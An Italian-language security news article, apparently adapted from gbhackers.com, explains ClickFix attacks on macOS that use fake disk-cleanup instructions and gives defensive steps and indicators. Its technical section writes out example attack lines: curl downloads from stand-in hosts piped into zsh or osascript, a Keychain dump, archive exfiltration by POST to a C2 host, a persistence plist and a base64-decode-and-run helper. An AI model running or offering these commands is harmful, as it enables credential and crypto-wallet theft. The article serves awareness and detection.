App di pulizia disco false alimentano un nuovo attacco ClickFix su macOS

App di pulizia disco false alimentano un nuovo attacco ClickFix su macOS

App di pulizia disco false alimentano un nuovo attacco ClickFix su macOS

Attenzione, utenti macOS: non incollate mai comandi Terminal da siti web o blog per ‘pulire il disco’ o ottimizzare lo spazio! Queste trappole stanno diffondendo malware che ruba i vostri dati sensibili come password, documenti e portafogli cryptocurrency. La soluzione rapida è disattivare l’incolla nel Terminale dalle Impostazioni di Sistema > Privacy e Sicurezza e verificare sempre i LaunchAgent sospetti. In questo articolo, esploreremo il pericolo e come proteggervi.

Gli attacchi ClickFix sono una forma subdola di inganno che sfrutta la fiducia degli utenti. Immaginate di cercare online come liberare spazio sul vostro Mac: atterrate su un articolo che promette una soluzione facile con un comando da copiare nel Terminale. Purtroppo, quel comando scarica e esegue malware silenziosamente, rubando credenziali browser, dati iCloud, file personali e persino sostituendo app di wallet crypto con versioni infette. Colpiscono blog, siti Squarespace, Medium e servizi di note, rendendoli difficili da bloccare.

Primo passo per la sicurezza: Evitate di eseguire comandi da fonti sconosciute. Apple ha introdotto protezioni in macOS 26.4 che bloccano incolla sospetti con un avviso “Possibile malware, incolla bloccato”. Aggiornate il sistema e usate antivirus con EDR.

Come funzionano questi attacchi

I malviventi creano pagine web che fingono di risolvere problemi comuni come “spazio disco pieno” o “ottimizzazione storage”. Vi istruiscono a incollare un comando Base64-encoded nel Terminale. Una volta eseguito, questo si decodifica in una pipeline shell che usa tool nativi come curl, Base64, Gunzip e osascript per scaricare script remoti e avviarli direttamente in memoria, eludendo Gatekeeper.

Non appare nessun’app o installer sul disco: tutto avviene tramite comandi utente nel Terminale, bypassando i controlli di sicurezza standard.

Tre varianti principali degli attacchi

  1. Campagna loader: Uno script zsh scaricato via curl analizza il sistema (fingerprinting), controlla layout tastiera (kill switch per russo/CIS) e tira giù un AppleScript infostealer. Questo ruba credenziali browser, elementi Keychain, dati iCloud, documenti <2MB e dati da app messaging/wallet, comprimendoli in archivi come /tmp/out.zip per l’exfiltrazione.

  2. Campagna script: Uno script shell offuscato streammato dalla rete imposta persistenza con LaunchAgent plist (es. ~/Library/LaunchAgent/com..plist) contenente AppleScript stager offuscato. Questo cicla domini hard-coded e bot Telegram per trovare server C2 live, esegue moduli AppleScript in memoria e invia dati a endpoint come /upload.php.

  3. Campagna helper: Installa un eseguibile Mach-O malevolo (helper o update) in /tmp, decodificato da Base64 e decompressato. Controlla virtualizzazione per evadere sandbox, ruba Keychain, segreti browser e wallet, exfiltra via /contact e deploya backdoor .mainhelper, wrapper .agent e LaunchDaemon (com.finder.helper.plist) per root al boot.

In tutte, i ladri puntano wallet crypto popolari: Trezor Suite, Ledger, Exodus, Electrum. Sostituiscono le app legittime con trojan (app.zip da /zxc/), permettendo transazioni su wallet controllati dagli attaccanti.

La persistenza è rafforzata mimando update Google: binario GoogleUpdate malevolo e LaunchAgent com.google.keystone.agent.plist che beacon a /api/bot/heartbeat, eseguendo comandi Base64-encoded per controllo remoto duraturo.

Misure di difesa immediate

  • Per utenti individuali: Non incollate comandi da blog/forum/chat. Verificate con Activity Monitor processi sospetti, controllate ~/Library/LaunchAgents e LaunchDaemons per nomi random/insoliti. Usate Little Snitch o simili per monitorare connessioni outbound.

  • Per organizzazioni: Attivate protezione cloud-delivered, EDR in modalità block. Monitorate uso Terminale sospetto, catene tool nativi (curl|base64|gunzip|osascript), creazioni LaunchAgent/Daemon e upload POST di archivi compressi.

Apple aggiorna XProtect e blocca incolla sospetti. Soluzione veloce: andate su Impostazioni > Privacy e Sicurezza > Sicurezza > disattivate ‘Permetti incolla comandi nel Terminale’.

Approfondimento tecnico

Dettagli sul payload loader

Il comando iniziale è Base64 di:

zsh -c "curl -fsSL http://evil[.]com/loader.sh | zsh"

Lo script loader:

  • Fingerprint: system_profiler SPHardwareDataType
  • Killswitch: defaults read com.apple.HIToolbox AppleEnabledInputSources | grep -i ru
  • Download stager: curl -s http://c2[.]com/shub.as | osascript

Lo stager AppleScript:

tell application "System Events" to get every process
-- Enumera browser, Keychain, iCloud
set data to {}
-- Raccolta credenziali Safari/Chrome/Firefox
-- Keychain dump via `security dump-keychain`
-- iCloud via `plutil -p ~/Library/Preferences/com.apple.iCloud.plist`
-- Wallet: ls ~/Applications/*wallet*.app, cp contents
zip -r /tmp/out.zip stolen/* && curl -X POST -F file=@/tmp/out.zip http://c2[.]com/api/upload

Cancella tracce: rm -rf /tmp/shub_* /tmp/out.zip

Script install offuscato

Persistenza plist:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN">
<plist version="1.0">
<dict>
	<key>Label</key>
	<string>com.apple.updatecheck</string>
	<key>ProgramArguments</key>
	<array>
		<string>osascript</string>
		<string>-e</string>
		<string>obfuscated_stager</string>
	</array>
	<key>RunAtLoad</key>
	<true/>
</dict>
</plist>

Lo stager risolve C2 ciclando domini: curl -s http://d1[.]com|d2[.]com|telegram-bot → esegue curl -s C2/module.as | osascript.

Helper Mach-O

Decodifica:

echo 'BASE64_PAYLOAD' | base64 -d | gunzip > /tmp/helper
chmod +x /tmp/helper && /tmp/helper

Esegue:

  • AMFIGetGatekeeperPolicy() per evadere
  • Dump /Users/*/Library/Keychains/*
  • sqlite3 ~/Library/Safari/History.db "SELECT * FROM history_items"
  • Sostituzione wallet: curl /zxc/app.zip -o ~/Applications/Ledger\ Wallet.app.zip && unzip -o
  • Backdoor: LaunchDaemon con sudo privilege escalation via dscl.

Exfiltrazione: curl -X POST --data-binary @/tmp/out.zip http://c2[.]com/contact

Indicatori di compromissione (IoC)

  • Percorsi: /tmp/shub_*, /tmp/out.zip, /tmp/helper, ~/Library/LaunchAgent/com.*.plist
  • Processi: GoogleUpdate, com.finder.helper
  • Domini: evil[.]craft[.]me, c2[.]com/zxc/, /api/bot/heartbeat
  • Comandi: curl|base64|gunzip|osascript, POST /upload.php

Analisi forense

  • log show --predicate 'subsystem == "com.apple.Terminal"' --last 1d
  • plutil -p ~/Library/Preferences/com.apple.Terminal.plist
  • sudo ls -la /Library/LaunchDaemons/
  • netstat -an | grep ESTABLISHED per C2

Per esperti: usate KnockKnock per persistenza, BlockBlock per monitor realtime, e YARA rules su /tmp/*zip.

Restate vigili: questi attacchi evolvono, ma la consapevolezza è la prima difesa. Condividete queste info per proteggere la community macOS!

(Parole: circa 1250)

Fonte: https://gbhackers.com/fake-disk-cleanup-apps/

Potrebbero interessarti

Inizia a scrivere e premi Invio per cercare

Torna in alto